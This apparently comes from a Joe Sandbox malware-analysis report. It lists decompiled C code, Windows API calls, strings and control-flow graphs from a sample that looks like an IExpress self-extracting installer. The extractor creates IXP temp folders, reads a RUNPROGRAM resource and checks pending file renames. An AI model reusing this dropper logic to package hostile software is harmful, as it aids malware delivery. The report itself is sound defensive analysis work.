                                                          0x00000000
                                                          0x00000000
                                                          0x010c572b
                                                          0x010c572b
                                                          0x010c572e
                                                          0x010c5742
                                                          0x010c5742
                                                          0x010c5745
                                                          0x010c576b
                                                          0x010c576b
                                                          0x00000000
                                                          0x010c5747
                                                          0x010c5747
                                                          0x010c574d
                                                          0x010c574f
                                                          0x010c5771
                                                          0x010c5771
                                                          0x010c5773
                                                          0x00000000
                                                          0x010c5751
                                                          0x010c5751
                                                          0x010c5753
                                                          0x00000000
                                                          0x010c5755
                                                          0x010c575b
                                                          0x010c5760
                                                          0x010c5762
                                                          0x00000000
                                                          0x010c5764
                                                          0x010c5764
                                                          0x010c5769
                                                          0x010c577e
                                                          0x010c577e
                                                          0x010c5781
                                                          0x010c5788
                                                          0x010c578d
                                                          0x010c578f
                                                          0x010c57b2
                                                          0x010c57b8
                                                          0x010c57bd
                                                          0x010c57bf
                                                          0x010c57cd
                                                          0x010c57cd
                                                          0x010c57dd
                                                          0x010c57e3
                                                          0x010c57ef
                                                          0x010c57f5
                                                          0x010c57f8
                                                          0x010c580a
                                                          0x010c580a
                                                          0x010c57fa
                                                          0x010c5802
                                                          0x010c5802
                                                          0x010c580d
                                                          0x010c580f
                                                          0x010c5830
                                                          0x010c5836
                                                          0x010c583d
                                                          0x010c584b
                                                          0x010c5851
                                                          0x010c5855
                                                          0x010c585a
                                                          0x010c585c
                                                          0x00000000
                                                          0x010c585e
                                                          0x010c585e
                                                          0x00000000
                                                          0x010c585e
                                                          0x010c5811
                                                          0x010c5817
                                                          0x010c5819
                                                          0x010c581f
                                                          0x00000000
                                                          0x010c581f
                                                          0x010c5791
                                                          0x010c5797
                                                          0x010c579c
                                                          0x010c579e
                                                          0x00000000
                                                          0x010c57a0
                                                          0x010c57a9
                                                          0x010c57ae
                                                          0x010c57b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c57b0
                                                          0x010c579e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5769
                                                          0x010c5762
                                                          0x010c5753
                                                          0x010c574f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c572e
                                                          0x00000000
                                                          0x010c5864
                                                          0x010c5864
                                                          0x010c5864
                                                          0x010c5717
                                                          0x00000000
                                                          0x010c56c3
                                                          0x010c56c5
                                                          0x010c56c9
                                                          0x010c56ce
                                                          0x010c56d0
                                                          0x00000000
                                                          0x010c56d6
                                                          0x010c56d6
                                                          0x010c56d8
                                                          0x010c56dd
                                                          0x010c56df
                                                          0x00000000
                                                          0x010c56e1
                                                          0x010c56e2
                                                          0x010c56e4
                                                          0x010c56e6
                                                          0x010c56eb
                                                          0x010c56ed
                                                          0x00000000
                                                          0x010c56f3
                                                          0x010c56f3
                                                          0x00000000
                                                          0x010c586c
                                                          0x010c5878
                                                          0x010c587e
                                                          0x010c5882
                                                          0x010c5883
                                                          0x010c5889
                                                          0x010c588e
                                                          0x010c588e
                                                          0x00000000
                                                          0x010c5896
                                                          0x010c56ed
                                                          0x010c56df
                                                          0x010c56d0
                                                          0x010c56c1
                                                          0x010c56a8
                                                          0x010c565b
                                                          0x010c565b
                                                          0x010c565d
                                                          0x010c5669
                                                          0x010c5669
                                                          0x010c565f
                                                          0x010c565f
                                                          0x010c5665
                                                          0x010c5667
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5667
                                                          0x010c566c
                                                          0x010c5673
                                                          0x010c5678
                                                          0x010c567a
                                                          0x010c589b
                                                          0x010c589b
                                                          0x010c5680
                                                          0x010c5685
                                                          0x010c568c
                                                          0x00000000
                                                          0x010c568c
                                                          0x010c567a
                                                          0x010c560e
                                                          0x010c5613
                                                          0x010c561a
                                                          0x010c5620
                                                          0x010c5626
                                                          0x00000000
                                                          0x010c5626
                                                          0x010c55db
                                                          0x010c55e0
                                                          0x010c55e7
                                                          0x010c55f1
                                                          0x010c55f6
                                                          0x010c55f6
                                                          0x010c55f6
                                                          0x010c58b7
                                                          0x010c58c7

                                                          APIs
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010C55CF
                                                          • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010C5638
                                                          • LocalFree.KERNEL32(00000000), ref: 010C564C
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010C5620
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                            • Part of subcall function 010C6285: GetLastError.KERNEL32(010C5BBC), ref: 010C6285
                                                          • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C56B9
                                                          • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010C571E
                                                          • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010C5737
                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010C57CD
                                                          • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010C57EF
                                                          • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010C5802
                                                            • Part of subcall function 010C2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010C2654
                                                          • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010C5830
                                                            • Part of subcall function 010C6517: FindResourceA.KERNEL32(010C0000,000007D6,00000005), ref: 010C652A
                                                            • Part of subcall function 010C6517: LoadResource.KERNEL32(010C0000,00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010C6538
                                                            • Part of subcall function 010C6517: DialogBoxIndirectParamA.USER32(010C0000,00000000,00000547,010C19E0,00000000), ref: 010C6557
                                                            • Part of subcall function 010C6517: FreeResource.KERNEL32(00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010C6560
                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010C5878
                                                            • Part of subcall function 010C597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010C59A8
                                                            • Part of subcall function 010C597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010C59AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                          • API String ID: 2436801531-559629209
                                                          • Opcode ID: 027df6e3eea2222926ffbab15b479a3eb66bb536b5db0c094228d1bf3ea7d120
                                                          • Instruction ID: 46f276ea39477bd13d785282053d30eb576c534751355fdb18af8fe22329e958
                                                          • Opcode Fuzzy Hash: 027df6e3eea2222926ffbab15b479a3eb66bb536b5db0c094228d1bf3ea7d120
                                                          • Instruction Fuzzy Hash: 0B812778B042059ADB719B799C44BEF76ADAB64B40F0001ADF5C6E3181EE74ADC58F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 95%
                                                          			E010C53A1(CHAR* __ecx, CHAR* __edx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t5;
                                                          				long _t13;
                                                          				int _t14;
                                                          				CHAR* _t20;
                                                          				int _t29;
                                                          				int _t30;
                                                          				CHAR* _t32;
                                                          				signed int _t33;
                                                          				void* _t34;
                                                          
                                                          				_t5 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t5 ^ _t33;
                                                          				_t32 = __edx;
                                                          				_t20 = __ecx;
                                                          				_t29 = 0;
                                                          				while(1) {
                                                          					E010C171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                          					_t34 = _t34 + 0x10;
                                                          					_t29 = _t29 + 1;
                                                          					E010C1680(_t32, 0x104, _t20);
                                                          					E010C658A(_t32, 0x104,  &_v268); // executed
                                                          					RemoveDirectoryA(_t32); // executed
                                                          					_t13 = GetFileAttributesA(_t32); // executed
                                                          					if(_t13 == 0xffffffff) {
                                                          						break;
                                                          					}
                                                          					if(_t29 < 0x190) {
                                                          						continue;
                                                          					}
                                                          					L3:
                                                          					_t30 = 0;
                                                          					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                          						_t30 = 1;
                                                          						DeleteFileA(_t32);
                                                          						CreateDirectoryA(_t32, 0);
                                                          					}
                                                          					L5:
                                                          					return E010C6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                          				}
                                                          				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                          				if(_t14 == 0) {
                                                          					goto L3;
                                                          				}
                                                          				_t30 = 1;
                                                          				 *0x10c8a20 = 1;
                                                          				goto L5;
                                                          			}

















                                                          0x010c53ac
                                                          0x010c53b3
                                                          0x010c53b9
                                                          0x010c53bb
                                                          0x010c53bd
                                                          0x010c53bf
                                                          0x010c53d1
                                                          0x010c53d6
                                                          0x010c53e0
                                                          0x010c53e2
                                                          0x010c53f5
                                                          0x010c53fb
                                                          0x010c5402
                                                          0x010c540b
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5413
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5415
                                                          0x010c5416
                                                          0x010c5427
                                                          0x010c542a
                                                          0x010c542b
                                                          0x010c5434
                                                          0x010c5434
                                                          0x010c543a
                                                          0x010c544c
                                                          0x010c544c
                                                          0x010c5452
                                                          0x010c545a
                                                          0x00000000
                                                          0x00000000
                                                          0x010c545e
                                                          0x010c545f
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 010C171E: _vsnprintf.MSVCRT ref: 010C1750
                                                          • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C53FB
                                                          • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5402
                                                          • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C541F
                                                          • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C542B
                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5434
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5452
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                          • API String ID: 1082909758-2659685179
                                                          • Opcode ID: e53b9d72768c88d7da286bf33e45aa9003f9f5f60ff538faa812171ae7b85d0f
                                                          • Instruction ID: 5238f167157bb263ecfd1831a8579ae48407a87f8a429d7f48bb31c71a802bfb
                                                          • Opcode Fuzzy Hash: e53b9d72768c88d7da286bf33e45aa9003f9f5f60ff538faa812171ae7b85d0f
                                                          • Instruction Fuzzy Hash: C9110471700208ABE3309B269C48FEF7A6DEBD5B15F10416DF6C6D3280DE7999428FA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 519 10c256d-10c257d 520 10c2622-10c2627 call 10c24e0 519->520 521 10c2583-10c2589 519->521 525 10c2629-10c262f 520->525 522 10c25e8-10c2607 RegOpenKeyExA 521->522 523 10c258b 521->523 527 10c2609-10c2620 RegQueryInfoKeyA 522->527 528 10c25e3-10c25e6 522->528 523->525 526 10c2591-10c2595 523->526 526->525 530 10c259b-10c25ba RegOpenKeyExA 526->530 531 10c25d1-10c25dd RegCloseKey 527->531 528->525 530->528 532 10c25bc-10c25cb RegQueryValueExA 530->532 531->528 532->531
                                                          C-Code - Quality: 86%
                                                          			E010C256D(signed int __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				signed int _t13;
                                                          				signed int _t19;
                                                          				long _t24;
                                                          				void* _t26;
                                                          				int _t31;
                                                          				void* _t34;
                                                          
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t13 = __ecx & 0x0000ffff;
                                                          				_t31 = 0;
                                                          				if(_t13 == 0) {
                                                          					_t31 = E010C24E0(_t26);
                                                          				} else {
                                                          					_t34 = _t13 - 1;
                                                          					if(_t34 == 0) {
                                                          						_v8 = 0;
                                                          						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                          							goto L7;
                                                          						} else {
                                                          							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                          							goto L6;
                                                          						}
                                                          						L12:
                                                          					} else {
                                                          						if(_t34 > 0 && __ecx <= 3) {
                                                          							_v8 = 0;
                                                          							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                          							if(_t24 == 0) {
                                                          								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                          								L6:
                                                          								asm("sbb eax, eax");
                                                          								_v8 = _v8 &  !( ~_t19);
                                                          								RegCloseKey(_v12); // executed
                                                          							}
                                                          							L7:
                                                          							_t31 = _v8;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t31;
                                                          				goto L12;
                                                          			}











                                                          0x010c2572
                                                          0x010c2573
                                                          0x010c2575
                                                          0x010c2578
                                                          0x010c257d
                                                          0x010c2627
                                                          0x010c2583
                                                          0x010c2586
                                                          0x010c2589
                                                          0x010c25eb
                                                          0x010c2607
                                                          0x00000000
                                                          0x010c2609
                                                          0x010c261a
                                                          0x00000000
                                                          0x010c261a
                                                          0x00000000
                                                          0x010c258b
                                                          0x010c258b
                                                          0x010c259e
                                                          0x010c25b2
                                                          0x010c25ba
                                                          0x010c25cb
                                                          0x010c25d1
                                                          0x010c25d6
                                                          0x010c25da
                                                          0x010c25dd
                                                          0x010c25dd
                                                          0x010c25e3
                                                          0x010c25e3
                                                          0x010c25e3
                                                          0x010c258b
                                                          0x010c2589
                                                          0x010c262f
                                                          0x00000000

                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,010C4096,010C4096,?,010C1ED3,00000001,00000000,?,?,010C4137,?), ref: 010C25B2
                                                          • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010C4096,?,010C1ED3,00000001,00000000,?,?,010C4137,?,010C4096), ref: 010C25CB
                                                          • RegCloseKey.KERNELBASE(?,?,010C1ED3,00000001,00000000,?,?,010C4137,?,010C4096), ref: 010C25DD
                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,010C4096,010C4096,?,010C1ED3,00000001,00000000,?,?,010C4137,?), ref: 010C25FF
                                                          • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010C4096,00000000,00000000,00000000,00000000,?,010C1ED3,00000001,00000000), ref: 010C261A
                                                          Strings
                                                          • PendingFileRenameOperations, xrefs: 010C25C3
                                                          • System\CurrentControlSet\Control\Session Manager, xrefs: 010C25A8
                                                          • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010C25F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: OpenQuery$CloseInfoValue
                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                          • API String ID: 2209512893-559176071
                                                          • Opcode ID: 53b17551fdb9191d1648fe695c5b4729602f5e4ce1ced80f7ec658aa74c3b8b2
                                                          • Instruction ID: 080f20ee91990fc4c15db5424312c66be245ddda9655c59d097e20121730e078
                                                          • Opcode Fuzzy Hash: 53b17551fdb9191d1648fe695c5b4729602f5e4ce1ced80f7ec658aa74c3b8b2
                                                          • Instruction Fuzzy Hash: BF118635902228FF9B30DB969C0DDFFBEBCEF15BA1F104099B989A2100D6354A44DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 533 10c6a60-10c6a91 call 10c7155 call 10c7208 GetStartupInfoW 539 10c6a93-10c6aa2 533->539 540 10c6abc-10c6abe 539->540 541 10c6aa4-10c6aa6 539->541 544 10c6abf-10c6ac5 540->544 542 10c6aaf-10c6aba Sleep 541->542 543 10c6aa8-10c6aad 541->543 542->539 543->544 545 10c6ac7-10c6acf _amsg_exit 544->545 546 10c6ad1-10c6ad7 544->546 547 10c6b0b-10c6b11 545->547 548 10c6ad9-10c6ae9 call 10c6c3f 546->548 549 10c6b05 546->549 551 10c6b2e-10c6b30 547->551 552 10c6b13-10c6b24 _initterm 547->552 553 10c6aee-10c6af2 548->553 549->547 554 10c6b3b-10c6b42 551->554 555 10c6b32-10c6b39 551->555 552->551 553->547 556 10c6af4-10c6b00 553->556 557 10c6b44-10c6b51 call 10c7060 554->557 558 10c6b67-10c6b71 554->558 555->554 560 10c6c39-10c6c3e call 10c724d 556->560 557->558 568 10c6b53-10c6b65 557->568 559 10c6b74-10c6b79 558->559 562 10c6b7b-10c6b7d 559->562 563 10c6bc5-10c6bc8 559->563 566 10c6b7f-10c6b81 562->566 567 10c6b94-10c6b98 562->567 570 10c6bca-10c6bd3 563->570 571 10c6bd6-10c6be3 _ismbblead 563->571 566->563 574 10c6b83-10c6b85 566->574 575 10c6b9a-10c6b9e 567->575 576 10c6ba0-10c6ba2 567->576 568->558 570->571 572 10c6be9-10c6bed 571->572 573 10c6be5-10c6be6 571->573 572->559 577 10c6c1e-10c6c25 572->577 573->572 574->567 578 10c6b87-10c6b8a 574->578 579 10c6ba3-10c6bbc call 10c2bfb 575->579 576->579 582 10c6c27-10c6c2d _cexit 577->582 583 10c6c32 577->583 578->567 581 10c6b8c-10c6b92 578->581 579->577 586 10c6bbe-10c6bbf exit 579->586 581->574 582->583 583->560 586->563
                                                          C-Code - Quality: 51%
                                                          			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed int* _t25;
                                                          				signed int _t26;
                                                          				signed int _t29;
                                                          				int _t30;
                                                          				signed int _t37;
                                                          				signed char _t41;
                                                          				signed int _t53;
                                                          				signed int _t54;
                                                          				intOrPtr _t56;
                                                          				signed int _t58;
                                                          				signed int _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t62;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          
                                                          				L010C7155();
                                                          				_push(0x58);
                                                          				_push(0x10c72b8);
                                                          				E010C7208(__ebx, __edi, __esi);
                                                          				 *(_t62 - 0x20) = 0;
                                                          				GetStartupInfoW(_t62 - 0x68);
                                                          				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                          				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                          				_t53 = 0;
                                                          				while(1) {
                                                          					asm("lock cmpxchg [edx], ecx");
                                                          					if(0 == 0) {
                                                          						break;
                                                          					}
                                                          					if(0 != _t56) {
                                                          						Sleep(0x3e8);
                                                          						continue;
                                                          					} else {
                                                          						_t58 = 1;
                                                          						_t53 = 1;
                                                          					}
                                                          					L7:
                                                          					_t67 =  *0x10c88b0 - _t58; // 0x2
                                                          					if(_t67 != 0) {
                                                          						__eflags =  *0x10c88b0; // 0x2
                                                          						if(__eflags != 0) {
                                                          							 *0x10c81e4 = _t58;
                                                          							goto L13;
                                                          						} else {
                                                          							 *0x10c88b0 = _t58;
                                                          							_t37 = E010C6C3F(0x10c10b8, 0x10c10c4); // executed
                                                          							__eflags = _t37;
                                                          							if(__eflags == 0) {
                                                          								goto L13;
                                                          							} else {
                                                          								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                          								_t30 = 0xff;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_push(0x1f);
                                                          						L010C6FF4();
                                                          						L13:
                                                          						_t68 =  *0x10c88b0 - _t58; // 0x2
                                                          						if(_t68 == 0) {
                                                          							_push(0x10c10b4);
                                                          							_push(0x10c10ac);
                                                          							L010C7202();
                                                          							 *0x10c88b0 = 2;
                                                          						}
                                                          						if(_t53 == 0) {
                                                          							 *0x10c88ac = 0;
                                                          						}
                                                          						_t71 =  *0x10c88b4;
                                                          						if( *0x10c88b4 != 0 && E010C7060(_t71, 0x10c88b4) != 0) {
                                                          							_t60 =  *0x10c88b4; // 0x0
                                                          							 *0x10ca288(0, 2, 0);
                                                          							 *_t60();
                                                          						}
                                                          						_t25 = __imp___acmdln; // 0x76665b9c
                                                          						_t59 =  *_t25;
                                                          						 *(_t62 - 0x1c) = _t59;
                                                          						_t54 =  *(_t62 - 0x20);
                                                          						while(1) {
                                                          							_t41 =  *_t59;
                                                          							if(_t41 > 0x20) {
                                                          								goto L32;
                                                          							}
                                                          							if(_t41 != 0) {
                                                          								if(_t54 != 0) {
                                                          									goto L32;
                                                          								} else {
                                                          									while(_t41 != 0 && _t41 <= 0x20) {
                                                          										_t59 = _t59 + 1;
                                                          										 *(_t62 - 0x1c) = _t59;
                                                          										_t41 =  *_t59;
                                                          									}
                                                          								}
                                                          							}
                                                          							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                          							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                          								_t29 = 0xa;
                                                          							} else {
                                                          								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                          							}
                                                          							_push(_t29);
                                                          							_t30 = E010C2BFB(0x10c0000, 0, _t59); // executed
                                                          							 *0x10c81e0 = _t30;
                                                          							__eflags =  *0x10c81f8;
                                                          							if( *0x10c81f8 == 0) {
                                                          								exit(_t30); // executed
                                                          								goto L32;
                                                          							}
                                                          							__eflags =  *0x10c81e4;
                                                          							if( *0x10c81e4 == 0) {
                                                          								__imp___cexit();
                                                          								_t30 =  *0x10c81e0; // 0x0
                                                          							}
                                                          							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                          							goto L40;
                                                          							L32:
                                                          							__eflags = _t41 - 0x22;
                                                          							if(_t41 == 0x22) {
                                                          								__eflags = _t54;
                                                          								_t15 = _t54 == 0;
                                                          								__eflags = _t15;
                                                          								_t54 = 0 | _t15;
                                                          								 *(_t62 - 0x20) = _t54;
                                                          							}
                                                          							_t26 = _t41 & 0x000000ff;
                                                          							__imp___ismbblead(_t26);
                                                          							__eflags = _t26;
                                                          							if(_t26 != 0) {
                                                          								_t59 = _t59 + 1;
                                                          								__eflags = _t59;
                                                          								 *(_t62 - 0x1c) = _t59;
                                                          							}
                                                          							_t59 = _t59 + 1;
                                                          							 *(_t62 - 0x1c) = _t59;
                                                          						}
                                                          					}
                                                          					L40:
                                                          					return E010C724D(_t30);
                                                          				}
                                                          				_t58 = 1;
                                                          				__eflags = 1;
                                                          				goto L7;
                                                          			}


















                                                          0x010c6a60
                                                          0x010c6a6a
                                                          0x010c6a6c
                                                          0x010c6a71
                                                          0x010c6a78
                                                          0x010c6a7f
                                                          0x010c6a85
                                                          0x010c6a8e
                                                          0x010c6a91
                                                          0x010c6a93
                                                          0x010c6a9c
                                                          0x010c6aa2
                                                          0x00000000
                                                          0x00000000
                                                          0x010c6aa6
                                                          0x010c6ab4
                                                          0x00000000
                                                          0x010c6aa8
                                                          0x010c6aaa
                                                          0x010c6aab
                                                          0x010c6aab
                                                          0x010c6abf
                                                          0x010c6abf
                                                          0x010c6ac5
                                                          0x010c6ad1
                                                          0x010c6ad7
                                                          0x010c6b05
                                                          0x00000000
                                                          0x010c6ad9
                                                          0x010c6ad9
                                                          0x010c6ae9
                                                          0x010c6af0
                                                          0x010c6af2
                                                          0x00000000
                                                          0x010c6af4
                                                          0x010c6af4
                                                          0x010c6afb
                                                          0x010c6afb
                                                          0x010c6af2
                                                          0x010c6ac7
                                                          0x010c6ac7
                                                          0x010c6ac9
                                                          0x010c6b0b
                                                          0x010c6b0b
                                                          0x010c6b11
                                                          0x010c6b13
                                                          0x010c6b18
                                                          0x010c6b1d
                                                          0x010c6b24
                                                          0x010c6b24
                                                          0x010c6b30
                                                          0x010c6b39
                                                          0x010c6b39
                                                          0x010c6b3b
                                                          0x010c6b42
                                                          0x010c6b57
                                                          0x010c6b5f
                                                          0x010c6b65
                                                          0x010c6b65
                                                          0x010c6b67
                                                          0x010c6b6c
                                                          0x010c6b6e
                                                          0x010c6b71
                                                          0x010c6b74
                                                          0x010c6b74
                                                          0x010c6b79
                                                          0x00000000
                                                          0x00000000
                                                          0x010c6b7d
                                                          0x010c6b81
                                                          0x00000000
                                                          0x00000000
                                                          0x010c6b83
                                                          0x010c6b8c
                                                          0x010c6b8d
                                                          0x010c6b90
                                                          0x010c6b90
                                                          0x010c6b83
                                                          0x010c6b81
                                                          0x010c6b94
                                                          0x010c6b98
                                                          0x010c6ba2
                                                          0x010c6b9a
                                                          0x010c6b9a
                                                          0x010c6b9a
                                                          0x010c6ba3
                                                          0x010c6bab
                                                          0x010c6bb0
                                                          0x010c6bb5
                                                          0x010c6bbc
                                                          0x010c6bbf
                                                          0x00000000
                                                          0x010c6bbf
                                                          0x010c6c1e
                                                          0x010c6c25
                                                          0x010c6c27
                                                          0x010c6c2d
                                                          0x010c6c2d
                                                          0x010c6c32
                                                          0x00000000
                                                          0x010c6bc5
                                                          0x010c6bc5
                                                          0x010c6bc8
                                                          0x010c6bcc
                                                          0x010c6bce
                                                          0x010c6bce
                                                          0x010c6bd1
                                                          0x010c6bd3
                                                          0x010c6bd3
                                                          0x010c6bd6
                                                          0x010c6bda
                                                          0x010c6be1
                                                          0x010c6be3
                                                          0x010c6be5
                                                          0x010c6be5
                                                          0x010c6be6
                                                          0x010c6be6
                                                          0x010c6be9
                                                          0x010c6bea
                                                          0x010c6bea
                                                          0x010c6b74
                                                          0x010c6c39
